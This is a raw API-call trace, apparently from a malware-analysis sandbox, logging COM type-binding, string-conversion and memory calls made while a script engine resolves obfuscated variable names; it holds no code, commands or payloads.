[0060.096] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_usM9FP", lHashVal=0x10f36d, wFlags=0x5, ppTInfo=0x3475e0, pDescKind=0x3475f0, ppFuncDesc=0x3475e4, ppVarDesc=0x884dc24, ppTypeComp=0x347770, pDummy=0x1 | out: ppTInfo=0x3475e0*=0x0, pDescKind=0x3475f0*=0, ppFuncDesc=0x3475e4, ppVarDesc=0x884dc24, ppTypeComp=0x347770*=0x0, pDummy=0x1) returned 0x0 [0060.096] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0x7, _Src=0x4852a16 | out: _Dst=0x34767c) returned 0x0 [0060.096] CRetailMalloc_Free () returned 0x6140301 [0060.096] ITypeComp:RemoteBind (in: This=0x87ce890, szName="crdUXit", lHashVal=0x102841, wFlags=0x5, ppTInfo=0x3475d0, pDescKind=0x3475e0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x0, pDummy=0x258 | out: ppTInfo=0x3475d0*=0x0, pDescKind=0x3475e0*=0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x0, pDummy=0x258) returned 0x0 [0060.097] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4852a3a, cbMultiByte=8, lpWideCharStr=0x347604, cchWideChar=9 | out: lpWideCharStr="crdUXit") returned 8 [0060.097] ITypeComp:RemoteBind (in: This=0x87ce668, szName="crdUXit", lHashVal=0x102841, wFlags=0x5, ppTInfo=0x3475d0, pDescKind=0x3475e0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x1, pDummy=0x258 | out: ppTInfo=0x3475d0*=0x0, pDescKind=0x3475e0*=0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x1, pDummy=0x258) returned 0x0 [0060.097] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4852a3a, cbMultiByte=8, lpWideCharStr=0x347604, cchWideChar=9 | out: lpWideCharStr="crdUXit") returned 8 [0060.097] ITypeComp:RemoteBind (in: This=0x87ceab8, szName="crdUXit", lHashVal=0x102841, wFlags=0x5, ppTInfo=0x3475d0, pDescKind=0x3475e0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x2, pDummy=0x258 | out: ppTInfo=0x3475d0*=0x0, pDescKind=0x3475e0*=0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x2, pDummy=0x258) returned 0x0 [0060.097] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4852a3a, cbMultiByte=8, lpWideCharStr=0x347604, cchWideChar=9 | out: lpWideCharStr="crdUXit") returned 8 [0060.097] ITypeComp:RemoteBind (in: This=0x87cef08, szName="crdUXit", lHashVal=0x102841, wFlags=0x5, ppTInfo=0x3475d0, pDescKind=0x3475e0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x4, pDummy=0x258 | out: ppTInfo=0x3475d0*=0x0, pDescKind=0x3475e0*=0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x4, pDummy=0x258) returned 0x0 [0060.098] CRetailMalloc_Alloc () returned 0x87fc470 [0060.098] _mbscpy_s (in: _Dst=0x87fc470, _DstSizeInBytes=0x8, _Src=0x4852a3a | out: _Dst=0x87fc470) returned 0x0 [0060.098] IUnknown:Release (This=0x87ce888) returned 0x5 [0060.098] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5701456, cbMultiByte=15, lpWideCharStr=0x347614, cchWideChar=16 | out: lpWideCharStr="_B_var_crdUXit") returned 15 [0060.098] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_crdUXit", lHashVal=0x102bc5, wFlags=0x5, ppTInfo=0x3475e0, pDescKind=0x3475f0, ppFuncDesc=0x3475e4, ppVarDesc=0x884dc24, ppTypeComp=0x347770, pDummy=0x1 | out: ppTInfo=0x3475e0*=0x0, pDescKind=0x3475f0*=0, ppFuncDesc=0x3475e4, ppVarDesc=0x884dc24, ppTypeComp=0x347770*=0x0, pDummy=0x1) returned 0x0 [0060.099] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0x8, _Src=0x4852a3a | out: _Dst=0x34767c) returned 0x0 [0060.099] CRetailMalloc_Free () returned 0x6140301 [0060.099] ITypeComp:RemoteBind (in: This=0x87ce890, szName="l3EHJR", lHashVal=0x1092ca, wFlags=0x5, ppTInfo=0x3475d0, pDescKind=0x3475e0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x0, pDummy=0x25a | out: ppTInfo=0x3475d0*=0x0, pDescKind=0x3475e0*=0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x0, pDummy=0x25a) returned 0x0 [0060.099] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4852a5e, cbMultiByte=7, lpWideCharStr=0x347604, cchWideChar=8 | out: lpWideCharStr="l3EHJR") returned 7 [0060.099] ITypeComp:RemoteBind (in: This=0x87ce668, szName="l3EHJR", lHashVal=0x1092ca, wFlags=0x5, ppTInfo=0x3475d0, pDescKind=0x3475e0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x1, pDummy=0x25a | out: ppTInfo=0x3475d0*=0x0, pDescKind=0x3475e0*=0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x1, pDummy=0x25a) returned 0x0 [0060.099] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4852a5e, cbMultiByte=7, lpWideCharStr=0x347604, cchWideChar=8 | out: lpWideCharStr="l3EHJR") returned 7 [0060.099] ITypeComp:RemoteBind (in: This=0x87ceab8, szName="l3EHJR", lHashVal=0x1092ca, wFlags=0x5, ppTInfo=0x3475d0, pDescKind=0x3475e0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x2, pDummy=0x25a | out: ppTInfo=0x3475d0*=0x0, pDescKind=0x3475e0*=0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x2, pDummy=0x25a) returned 0x0 [0060.100] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4852a5e, cbMultiByte=7, lpWideCharStr=0x347604, cchWideChar=8 | out: lpWideCharStr="l3EHJR") returned 7 [0060.100] ITypeComp:RemoteBind (in: This=0x87cef08, szName="l3EHJR", lHashVal=0x1092ca, wFlags=0x5, ppTInfo=0x3475d0, pDescKind=0x3475e0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x4, pDummy=0x25a | out: ppTInfo=0x3475d0*=0x0, pDescKind=0x3475e0*=0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x4, pDummy=0x25a) returned 0x0 [0060.100] CRetailMalloc_Alloc () returned 0x87fc470 [0060.100] _mbscpy_s (in: _Dst=0x87fc470, _DstSizeInBytes=0x7, _Src=0x4852a5e | out: _Dst=0x87fc470) returned 0x0 [0060.100] IUnknown:Release (This=0x87ce888) returned 0x5 [0060.101] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5701482, cbMultiByte=14, lpWideCharStr=0x347614, cchWideChar=15 | out: lpWideCharStr="_B_var_l3EHJR") returned 14 [0060.101] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_l3EHJR", lHashVal=0x100d34, wFlags=0x5, ppTInfo=0x3475e0, pDescKind=0x3475f0, ppFuncDesc=0x3475e4, ppVarDesc=0x884dc24, ppTypeComp=0x347770, pDummy=0x1 | out: ppTInfo=0x3475e0*=0x0, pDescKind=0x3475f0*=0, ppFuncDesc=0x3475e4, ppVarDesc=0x884dc24, ppTypeComp=0x347770*=0x0, pDummy=0x1) returned 0x0 [0060.101] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0x7, _Src=0x4852a5e | out: _Dst=0x34767c) returned 0x0 [0060.105] CRetailMalloc_Free () returned 0x6140301 [0060.105] ITypeComp:RemoteBind (in: This=0x87ce890, szName="t7BFnO", lHashVal=0x1034b7, wFlags=0x5, ppTInfo=0x3475d0, pDescKind=0x3475e0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x0, pDummy=0x25c | out: ppTInfo=0x3475d0*=0x0, pDescKind=0x3475e0*=0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x0, pDummy=0x25c) returned 0x0 [0060.105] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4852a82, cbMultiByte=7, lpWideCharStr=0x347604, cchWideChar=8 | out: lpWideCharStr="t7BFnO") returned 7 [0060.105] ITypeComp:RemoteBind (in: This=0x87ce668, szName="t7BFnO", lHashVal=0x1034b7, wFlags=0x5, ppTInfo=0x3475d0, pDescKind=0x3475e0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x1, pDummy=0x25c | out: ppTInfo=0x3475d0*=0x0, pDescKind=0x3475e0*=0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x1, pDummy=0x25c) returned 0x0 [0060.105] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4852a82, cbMultiByte=7, lpWideCharStr=0x347604, cchWideChar=8 | out: lpWideCharStr="t7BFnO") returned 7 [0060.105] ITypeComp:RemoteBind (in: This=0x87ceab8, szName="t7BFnO", lHashVal=0x1034b7, wFlags=0x5, ppTInfo=0x3475d0, pDescKind=0x3475e0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x2, pDummy=0x25c | out: ppTInfo=0x3475d0*=0x0, pDescKind=0x3475e0*=0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x2, pDummy=0x25c) returned 0x0 [0060.106] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4852a82, cbMultiByte=7, lpWideCharStr=0x347604, cchWideChar=8 | out: lpWideCharStr="t7BFnO") returned 7 [0060.106] ITypeComp:RemoteBind (in: This=0x87cef08, szName="t7BFnO", lHashVal=0x1034b7, wFlags=0x5, ppTInfo=0x3475d0, pDescKind=0x3475e0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x4, pDummy=0x25c | out: ppTInfo=0x3475d0*=0x0, pDescKind=0x3475e0*=0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x4, pDummy=0x25c) returned 0x0 [0060.106] CRetailMalloc_Alloc () returned 0x87fc470 [0060.106] _mbscpy_s (in: _Dst=0x87fc470, _DstSizeInBytes=0x7, _Src=0x4852a82 | out: _Dst=0x87fc470) returned 0x0 [0060.107] IUnknown:Release (This=0x87ce888) returned 0x5 [0060.107] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x57014ae, cbMultiByte=14, lpWideCharStr=0x347614, cchWideChar=15 | out: lpWideCharStr="_B_var_t7BFnO") returned 14 [0060.107] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_t7BFnO", lHashVal=0x10af60, wFlags=0x5, ppTInfo=0x3475e0, pDescKind=0x3475f0, ppFuncDesc=0x3475e4, ppVarDesc=0x884dc24, ppTypeComp=0x347770, pDummy=0x1 | out: ppTInfo=0x3475e0*=0x0, pDescKind=0x3475f0*=0, ppFuncDesc=0x3475e4, ppVarDesc=0x884dc24, ppTypeComp=0x347770*=0x0, pDummy=0x1) returned 0x0 [0060.107] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0x7, _Src=0x4852a82 | out: _Dst=0x34767c) returned 0x0 [0060.107] CRetailMalloc_Realloc () returned 0x888fc70 [0060.107] CRetailMalloc_Free () returned 0x6140301 [0060.107] ITypeComp:RemoteBind (in: This=0x87ce890, szName="xXFncyo", lHashVal=0x102198, wFlags=0x5, ppTInfo=0x3475d0, pDescKind=0x3475e0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x0, pDummy=0x25e | out: ppTInfo=0x3475d0*=0x0, pDescKind=0x3475e0*=0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x0, pDummy=0x25e) returned 0x0 [0060.107] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4852aa6, cbMultiByte=8, lpWideCharStr=0x347604, cchWideChar=9 | out: lpWideCharStr="xXFncyo") returned 8 [0060.107] ITypeComp:RemoteBind (in: This=0x87ce668, szName="xXFncyo", lHashVal=0x102198, wFlags=0x5, ppTInfo=0x3475d0, pDescKind=0x3475e0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x1, pDummy=0x25e | out: ppTInfo=0x3475d0*=0x0, pDescKind=0x3475e0*=0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x1, pDummy=0x25e) returned 0x0 [0060.107] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4852aa6, cbMultiByte=8, lpWideCharStr=0x347604, cchWideChar=9 | out: lpWideCharStr="xXFncyo") returned 8 [0060.108] ITypeComp:RemoteBind (in: This=0x87ceab8, szName="xXFncyo", lHashVal=0x102198, wFlags=0x5, ppTInfo=0x3475d0, pDescKind=0x3475e0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x2, pDummy=0x25e | out: ppTInfo=0x3475d0*=0x0, pDescKind=0x3475e0*=0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x2, pDummy=0x25e) returned 0x0 [0060.108] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4852aa6, cbMultiByte=8, lpWideCharStr=0x347604, cchWideChar=9 | out: lpWideCharStr="xXFncyo") returned 8 [0060.108] ITypeComp:RemoteBind (in: This=0x87cef08, szName="xXFncyo", lHashVal=0x102198, wFlags=0x5, ppTInfo=0x3475d0, pDescKind=0x3475e0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x4, pDummy=0x25e | out: ppTInfo=0x3475d0*=0x0, pDescKind=0x3475e0*=0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x4, pDummy=0x25e) returned 0x0 [0060.108] CRetailMalloc_Alloc () returned 0x87fc470 [0060.108] _mbscpy_s (in: _Dst=0x87fc470, _DstSizeInBytes=0x8, _Src=0x4852aa6 | out: _Dst=0x87fc470) returned 0x0 [0060.109] IUnknown:Release (This=0x87ce888) returned 0x5 [0060.109] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x57014da, cbMultiByte=15, lpWideCharStr=0x347614, cchWideChar=16 | out: lpWideCharStr="_B_var_xXFncyo") returned 15 [0060.109] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_xXFncyo", lHashVal=0x10159b, wFlags=0x5, ppTInfo=0x3475e0, pDescKind=0x3475f0, ppFuncDesc=0x3475e4, ppVarDesc=0x884dc24, ppTypeComp=0x347770, pDummy=0x1 | out: ppTInfo=0x3475e0*=0x0, pDescKind=0x3475f0*=0, ppFuncDesc=0x3475e4, ppVarDesc=0x884dc24, ppTypeComp=0x347770*=0x0, pDummy=0x1) returned 0x0 [0060.109] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0x8, _Src=0x4852aa6 | out: _Dst=0x34767c) returned 0x0 [0060.109] CRetailMalloc_Free () returned 0x6140301 [0060.109] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4852aca, cbMultiByte=6, lpWideCharStr=0x347604, cchWideChar=7 | out: lpWideCharStr="gCekx") returned 6 [0060.109] ITypeComp:RemoteBind (in: This=0x87ce890, szName="gCekx", lHashVal=0x1023c6, wFlags=0x3, ppTInfo=0x3475d0, pDescKind=0x3475e0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x0, pDummy=0x260 | out: ppTInfo=0x3475d0*=0x0, pDescKind=0x3475e0*=0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x0, pDummy=0x260) returned 0x0 [0060.109] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4852aca, cbMultiByte=6, lpWideCharStr=0x347604, cchWideChar=7 | out: lpWideCharStr="gCekx") returned 6 [0060.110] ITypeComp:RemoteBind (in: This=0x87ce668, szName="gCekx", lHashVal=0x1023c6, wFlags=0x3, ppTInfo=0x3475d0, pDescKind=0x3475e0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x1, pDummy=0x260 | out: ppTInfo=0x3475d0*=0x0, pDescKind=0x3475e0*=0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x1, pDummy=0x260) returned 0x0 [0060.110] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4852aca, cbMultiByte=6, lpWideCharStr=0x347604, cchWideChar=7 | out: lpWideCharStr="gCekx") returned 6 [0060.110] ITypeComp:RemoteBind (in: This=0x87ceab8, szName="gCekx", lHashVal=0x1023c6, wFlags=0x3, ppTInfo=0x3475d0, pDescKind=0x3475e0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x2, pDummy=0x260 | out: ppTInfo=0x3475d0*=0x0, pDescKind=0x3475e0*=0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x2, pDummy=0x260) returned 0x0 [0060.110] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4852aca, cbMultiByte=6, lpWideCharStr=0x347604, cchWideChar=7 | out: lpWideCharStr="gCekx") returned 6 [0060.110] ITypeComp:RemoteBind (in: This=0x87cef08, szName="gCekx", lHashVal=0x1023c6, wFlags=0x3, ppTInfo=0x3475d0, pDescKind=0x3475e0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x4, pDummy=0x260 | out: ppTInfo=0x3475d0*=0x0, pDescKind=0x3475e0*=0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x4, pDummy=0x260) returned 0x0 [0060.111] CRetailMalloc_Alloc () returned 0x87fc470 [0060.111] _mbscpy_s (in: _Dst=0x87fc470, _DstSizeInBytes=0x6, _Src=0x4852aca | out: _Dst=0x87fc470) returned 0x0 [0060.111] IUnknown:Release (This=0x87ce888) returned 0x5 [0060.111] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5701506, cbMultiByte=13, lpWideCharStr=0x347614, cchWideChar=14 | out: lpWideCharStr="_B_var_gCekx") returned 13 [0060.111] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_gCekx", lHashVal=0x10e7f2, wFlags=0x3, ppTInfo=0x3475e0, pDescKind=0x3475f0, ppFuncDesc=0x3475e4, ppVarDesc=0x884dc24, ppTypeComp=0x347770, pDummy=0x1 | out: ppTInfo=0x3475e0*=0x0, pDescKind=0x3475f0*=0, ppFuncDesc=0x3475e4, ppVarDesc=0x884dc24, ppTypeComp=0x347770*=0x0, pDummy=0x1) returned 0x0 [0060.112] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0x6, _Src=0x4852aca | out: _Dst=0x34767c) returned 0x0 [0060.112] CRetailMalloc_Free () returned 0x6140301 [0060.112] ITypeComp:RemoteBind (in: This=0x87ce890, szName="YYUK98qCE", lHashVal=0x10e3b4, wFlags=0x5, ppTInfo=0x3475d0, pDescKind=0x3475e0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x0, pDummy=0x262 | out: ppTInfo=0x3475d0*=0x0, pDescKind=0x3475e0*=0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x0, pDummy=0x262) returned 0x0 [0060.112] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4852aee, cbMultiByte=10, lpWideCharStr=0x347604, cchWideChar=11 | out: lpWideCharStr="YYUK98qCE") returned 10 [0060.112] ITypeComp:RemoteBind (in: This=0x87ce668, szName="YYUK98qCE", lHashVal=0x10e3b4, wFlags=0x5, ppTInfo=0x3475d0, pDescKind=0x3475e0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x1, pDummy=0x262 | out: ppTInfo=0x3475d0*=0x0, pDescKind=0x3475e0*=0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x1, pDummy=0x262) returned 0x0 [0060.112] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4852aee, cbMultiByte=10, lpWideCharStr=0x347604, cchWideChar=11 | out: lpWideCharStr="YYUK98qCE") returned 10 [0060.112] ITypeComp:RemoteBind (in: This=0x87ceab8, szName="YYUK98qCE", lHashVal=0x10e3b4, wFlags=0x5, ppTInfo=0x3475d0, pDescKind=0x3475e0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x2, pDummy=0x262 | out: ppTInfo=0x3475d0*=0x0, pDescKind=0x3475e0*=0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x2, pDummy=0x262) returned 0x0 [0060.113] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4852aee, cbMultiByte=10, lpWideCharStr=0x347604, cchWideChar=11 | out: lpWideCharStr="YYUK98qCE") returned 10 [0060.113] ITypeComp:RemoteBind (in: This=0x87cef08, szName="YYUK98qCE", lHashVal=0x10e3b4, wFlags=0x5, ppTInfo=0x3475d0, pDescKind=0x3475e0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x4, pDummy=0x262 | out: ppTInfo=0x3475d0*=0x0, pDescKind=0x3475e0*=0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x4, pDummy=0x262) returned 0x0 [0060.113] CRetailMalloc_Alloc () returned 0x87504e0 [0060.113] _mbscpy_s (in: _Dst=0x87504e0, _DstSizeInBytes=0xa, _Src=0x4852aee | out: _Dst=0x87504e0) returned 0x0 [0060.113] IUnknown:Release (This=0x87ce888) returned 0x5 [0060.114] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5701532, cbMultiByte=17, lpWideCharStr=0x347614, cchWideChar=18 | out: lpWideCharStr="_B_var_YYUK98qCE") returned 17 [0060.114] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_YYUK98qCE", lHashVal=0x10ecf9, wFlags=0x5, ppTInfo=0x3475e0, pDescKind=0x3475f0, ppFuncDesc=0x3475e4, ppVarDesc=0x884dc24, ppTypeComp=0x347770, pDummy=0x1 | out: ppTInfo=0x3475e0*=0x0, pDescKind=0x3475f0*=0, ppFuncDesc=0x3475e4, ppVarDesc=0x884dc24, ppTypeComp=0x347770*=0x0, pDummy=0x1) returned 0x0 [0060.114] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0xa, _Src=0x4852aee | out: _Dst=0x34767c) returned 0x0 [0060.114] CRetailMalloc_Free () returned 0xcae0401 [0060.114] ITypeComp:RemoteBind (in: This=0x87ce890, szName="dF70nbsu", lHashVal=0x103c23, wFlags=0x5, ppTInfo=0x3475d0, pDescKind=0x3475e0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x0, pDummy=0x264 | out: ppTInfo=0x3475d0*=0x0, pDescKind=0x3475e0*=0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x0, pDummy=0x264) returned 0x0 [0060.114] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4852b16, cbMultiByte=9, lpWideCharStr=0x347604, cchWideChar=10 | out: lpWideCharStr="dF70nbsu") returned 9 [0060.114] ITypeComp:RemoteBind (in: This=0x87ce668, szName="dF70nbsu", lHashVal=0x103c23, wFlags=0x5, ppTInfo=0x3475d0, pDescKind=0x3475e0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x1, pDummy=0x264 | out: ppTInfo=0x3475d0*=0x0, pDescKind=0x3475e0*=0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x1, pDummy=0x264) returned 0x0 [0060.114] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4852b16, cbMultiByte=9, lpWideCharStr=0x347604, cchWideChar=10 | out: lpWideCharStr="dF70nbsu") returned 9 [0060.114] ITypeComp:RemoteBind (in: This=0x87ceab8, szName="dF70nbsu", lHashVal=0x103c23, wFlags=0x5, ppTInfo=0x3475d0, pDescKind=0x3475e0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x2, pDummy=0x264 | out: ppTInfo=0x3475d0*=0x0, pDescKind=0x3475e0*=0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x2, pDummy=0x264) returned 0x0 [0060.115] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4852b16, cbMultiByte=9, lpWideCharStr=0x347604, cchWideChar=10 | out: lpWideCharStr="dF70nbsu") returned 9 [0060.115] ITypeComp:RemoteBind (in: This=0x87cef08, szName="dF70nbsu", lHashVal=0x103c23, wFlags=0x5, ppTInfo=0x3475d0, pDescKind=0x3475e0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x4, pDummy=0x264 | out: ppTInfo=0x3475d0*=0x0, pDescKind=0x3475e0*=0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x4, pDummy=0x264) returned 0x0 [0060.115] CRetailMalloc_Alloc () returned 0x87fc470 [0060.115] _mbscpy_s (in: _Dst=0x87fc470, _DstSizeInBytes=0x9, _Src=0x4852b16 | out: _Dst=0x87fc470) returned 0x0 [0060.116] IUnknown:Release (This=0x87ce888) returned 0x5 [0060.116] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5701562, cbMultiByte=16, lpWideCharStr=0x347614, cchWideChar=17 | out: lpWideCharStr="_B_var_dF70nbsu") returned 16 [0060.116] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_dF70nbsu", lHashVal=0x1013ac, wFlags=0x5, ppTInfo=0x3475e0, pDescKind=0x3475f0, ppFuncDesc=0x3475e4, ppVarDesc=0x884dc24, ppTypeComp=0x347770, pDummy=0x1 | out: ppTInfo=0x3475e0*=0x0, pDescKind=0x3475f0*=0, ppFuncDesc=0x3475e4, ppVarDesc=0x884dc24, ppTypeComp=0x347770*=0x0, pDummy=0x1) returned 0x0 [0060.116] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0x9, _Src=0x4852b16 | out: _Dst=0x34767c) returned 0x0 [0060.116] CRetailMalloc_Free () returned 0x6140301 [0060.116] ITypeComp:RemoteBind (in: This=0x87ce890, szName="FfuX3QCsn", lHashVal=0x10c0b2, wFlags=0x3, ppTInfo=0x3475d0, pDescKind=0x3475e0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x0, pDummy=0x268 | out: ppTInfo=0x3475d0*=0x0, pDescKind=0x3475e0*=0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x0, pDummy=0x268) returned 0x0 [0060.116] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4852b62, cbMultiByte=10, lpWideCharStr=0x347604, cchWideChar=11 | out: lpWideCharStr="FfuX3QCsn") returned 10 [0060.116] ITypeComp:RemoteBind (in: This=0x87ce668, szName="FfuX3QCsn", lHashVal=0x10c0b2, wFlags=0x3, ppTInfo=0x3475d0, pDescKind=0x3475e0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x1, pDummy=0x268 | out: ppTInfo=0x3475d0*=0x0, pDescKind=0x3475e0*=0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x1, pDummy=0x268) returned 0x0 [0060.117] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4852b62, cbMultiByte=10, lpWideCharStr=0x347604, cchWideChar=11 | out: lpWideCharStr="FfuX3QCsn") returned 10 [0060.117] ITypeComp:RemoteBind (in: This=0x87ceab8, szName="FfuX3QCsn", lHashVal=0x10c0b2, wFlags=0x3, ppTInfo=0x3475d0, pDescKind=0x3475e0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x2, pDummy=0x268 | out: ppTInfo=0x3475d0*=0x0, pDescKind=0x3475e0*=0, ppFuncDesc=0x3475d4, ppVarDesc=0x347770, ppTypeComp=0x2, pDummy=0x268) returned 0x0 [0060.117] _mbscpy_s (in: _Dst=0x87504e0, _DstSizeInBytes=0xa, _Src=0x4852b62 | out: _Dst=0x87504e0) returned 0x0 [0060.117] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0xa, _Src=0x4852b62 | out: _Dst=0x34767c) returned 0x0 [0060.117] CRetailMalloc_Free () returned 0xcae0401 [0060.118] _mbscpy_s (in: _Dst=0x87fc470, _DstSizeInBytes=0x6, _Src=0x4852b3e | out: _Dst=0x87fc470) returned 0x0 [0060.118] _mbscpy_s (in: _Dst=0x34767c, _DstSizeInBytes=0x6, _Src=0x4852b3e | out: _Dst=0x34767c) returned 0x0 [0060.118] CRetailMalloc_Free () returned 0x6140301 [0060.118] 